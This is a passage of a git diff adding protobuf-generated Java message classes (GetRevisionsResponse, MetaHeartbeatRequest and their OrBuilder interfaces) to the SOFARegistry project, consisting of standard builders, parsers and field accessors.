internalGetMutableRevisions(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsResponse_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse.class, + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + internalGetMutableRevisions().clear(); + statusCode_ = 0; + + message_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsResponse_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse build() { + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse result = + new com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.revisions_ = internalGetRevisions(); + result.revisions_.makeImmutable(); + result.statusCode_ = statusCode_; + result.message_ = message_; + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + .getDefaultInstance()) return this; + internalGetMutableRevisions().mergeFrom(other.internalGetRevisions()); + if (other.getStatusCode() != 0) { + setStatusCode(other.getStatusCode()); + } + if (!other.getMessage().isEmpty()) { + message_ = other.message_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + revisions_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + internalGetRevisions() { + if (revisions_ == null) { + return com.google.protobuf.MapField.emptyMapField(RevisionsDefaultEntryHolder.defaultEntry); + } + return revisions_; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + internalGetMutableRevisions() { + onChanged(); + ; + if (revisions_ == null) { + revisions_ = + com.google.protobuf.MapField.newMapField(RevisionsDefaultEntryHolder.defaultEntry); + } + if (!revisions_.isMutable()) { + revisions_ = revisions_.copy(); + } + return revisions_; + } + + public int getRevisionsCount() { + return internalGetRevisions().getMap().size(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public boolean containsRevisions(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetRevisions().getMap().containsKey(key); + } + /** Use {@link #getRevisionsMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + getRevisions() { + return getRevisionsMap(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + getRevisionsMap() { + return internalGetRevisions().getMap(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister getRevisionsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetRevisions().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .MetaRegister> revisions = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister getRevisionsOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetRevisions().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearRevisions() { + internalGetMutableRevisions().getMutableMap().clear(); + return this; + } + /** map<string, .MetaRegister> revisions = 1; */ + public Builder removeRevisions(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableRevisions().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + getMutableRevisions() { + return internalGetMutableRevisions().getMutableMap(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public Builder putRevisions( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.MetaRegister value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableRevisions().getMutableMap().put(key, value); + return this; + } + /** map<string, .MetaRegister> revisions = 1; */ + public Builder putAllRevisions( + java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + values) { + internalGetMutableRevisions().getMutableMap().putAll(values); + return this; + } + + private int statusCode_; + /** int32 statusCode = 2; */ + public int getStatusCode() { + return statusCode_; + } + /** int32 statusCode = 2; */ + public Builder setStatusCode(int value) { + + statusCode_ = value; + onChanged(); + return this; + } + /** int32 statusCode = 2; */ + public Builder clearStatusCode() { + + statusCode_ = 0; + onChanged(); + return this; + } + + private java.lang.Object message_ = ""; + /** string message = 3; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string message = 3; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string message = 3; */ + public Builder setMessage(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + message_ = value; + onChanged(); + return this; + } + /** string message = 3; */ + public Builder clearMessage() { + + message_ = getDefaultInstance().getMessage(); + onChanged(); + return this; + } + /** string message = 3; */ + public Builder setMessageBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + message_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:GetRevisionsResponse) + } + + // @@protoc_insertion_point(class_scope:GetRevisionsResponse) + private static final com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public GetRevisionsResponse parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new GetRevisionsResponse(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsResponseOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsResponseOrBuilder.java new file mode 100644 index 000000000..dd9c8a669 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsResponseOrBuilder.java @@ -0,0 +1,50 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface GetRevisionsResponseOrBuilder + extends + // @@protoc_insertion_point(interface_extends:GetRevisionsResponse) + com.google.protobuf.MessageOrBuilder { + + /** map<string, .MetaRegister> revisions = 1; */ + int getRevisionsCount(); + /** map<string, .MetaRegister> revisions = 1; */ + boolean containsRevisions(java.lang.String key); + /** Use {@link #getRevisionsMap()} instead. */ + @java.lang.Deprecated + java.util.Map + getRevisions(); + /** map<string, .MetaRegister> revisions = 1; */ + java.util.Map + getRevisionsMap(); + /** map<string, .MetaRegister> revisions = 1; */ + com.alipay.sofa.registry.common.model.client.pb.MetaRegister getRevisionsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister defaultValue); + /** map<string, .MetaRegister> revisions = 1; */ + com.alipay.sofa.registry.common.model.client.pb.MetaRegister getRevisionsOrThrow( + java.lang.String key); + + /** int32 statusCode = 2; */ + int getStatusCode(); + + /** string message = 3; */ + java.lang.String getMessage(); + /** string message = 3; */ + com.google.protobuf.ByteString getMessageBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatRequest.java new file mode 100644 index 000000000..d4dd86e6b --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatRequest.java @@ -0,0 +1,562 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code MetaHeartbeatRequest} */ +public final class MetaHeartbeatRequest extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:MetaHeartbeatRequest) + MetaHeartbeatRequestOrBuilder { + private static final long serialVersionUID = 0L; + // Use MetaHeartbeatRequest.newBuilder() to construct. + private MetaHeartbeatRequest(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private MetaHeartbeatRequest() { + revisions_ = com.google.protobuf.LazyStringArrayList.EMPTY; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private MetaHeartbeatRequest( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000001; + } + revisions_.add(s); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = revisions_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatRequest_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatRequest_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest.class, + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest.Builder.class); + } + + public static final int REVISIONS_FIELD_NUMBER = 1; + private com.google.protobuf.LazyStringList revisions_; + /** repeated string revisions = 1; */ + public com.google.protobuf.ProtocolStringList getRevisionsList() { + return revisions_; + } + /** repeated string revisions = 1; */ + public int getRevisionsCount() { + return revisions_.size(); + } + /** repeated string revisions = 1; */ + public java.lang.String getRevisions(int index) { + return revisions_.get(index); + } + /** repeated string revisions = 1; */ + public com.google.protobuf.ByteString getRevisionsBytes(int index) { + return revisions_.getByteString(index); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + for (int i = 0; i < revisions_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, revisions_.getRaw(i)); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + { + int dataSize = 0; + for (int i = 0; i < revisions_.size(); i++) { + dataSize += computeStringSizeNoTag(revisions_.getRaw(i)); + } + size += dataSize; + size += 1 * getRevisionsList().size(); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest other = + (com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest) obj; + + boolean result = true; + result = result && getRevisionsList().equals(other.getRevisionsList()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (getRevisionsCount() > 0) { + hash = (37 * hash) + REVISIONS_FIELD_NUMBER; + hash = (53 * hash) + getRevisionsList().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code MetaHeartbeatRequest} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:MetaHeartbeatRequest) + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequestOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatRequest_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatRequest_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest.class, + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + revisions_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatRequest_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest build() { + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest result = + new com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest(this); + int from_bitField0_ = bitField0_; + if (((bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = revisions_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000001); + } + result.revisions_ = revisions_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + .getDefaultInstance()) return this; + if (!other.revisions_.isEmpty()) { + if (revisions_.isEmpty()) { + revisions_ = other.revisions_; + bitField0_ = (bitField0_ & ~0x00000001); + } else { + ensureRevisionsIsMutable(); + revisions_.addAll(other.revisions_); + } + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.google.protobuf.LazyStringList revisions_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureRevisionsIsMutable() { + if (!((bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = new com.google.protobuf.LazyStringArrayList(revisions_); + bitField0_ |= 0x00000001; + } + } + /** repeated string revisions = 1; */ + public com.google.protobuf.ProtocolStringList getRevisionsList() { + return revisions_.getUnmodifiableView(); + } + /** repeated string revisions = 1; */ + public int getRevisionsCount() { + return revisions_.size(); + } + /** repeated string revisions = 1; */ + public java.lang.String getRevisions(int index) { + return revisions_.get(index); + } + /** repeated string revisions = 1; */ + public com.google.protobuf.ByteString getRevisionsBytes(int index) { + return revisions_.getByteString(index); + } + /** repeated string revisions = 1; */ + public Builder setRevisions(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureRevisionsIsMutable(); + revisions_.set(index, value); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder addRevisions(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureRevisionsIsMutable(); + revisions_.add(value); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder addAllRevisions(java.lang.Iterable values) { + ensureRevisionsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, revisions_); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder clearRevisions() { + revisions_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder addRevisionsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureRevisionsIsMutable(); + revisions_.add(value); + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:MetaHeartbeatRequest) + } + + // @@protoc_insertion_point(class_scope:MetaHeartbeatRequest) + private static final com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public MetaHeartbeatRequest parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new MetaHeartbeatRequest(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatRequestOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatRequestOrBuilder.java new file mode 100644 index 000000000..b97c58b7e --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatRequestOrBuilder.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the 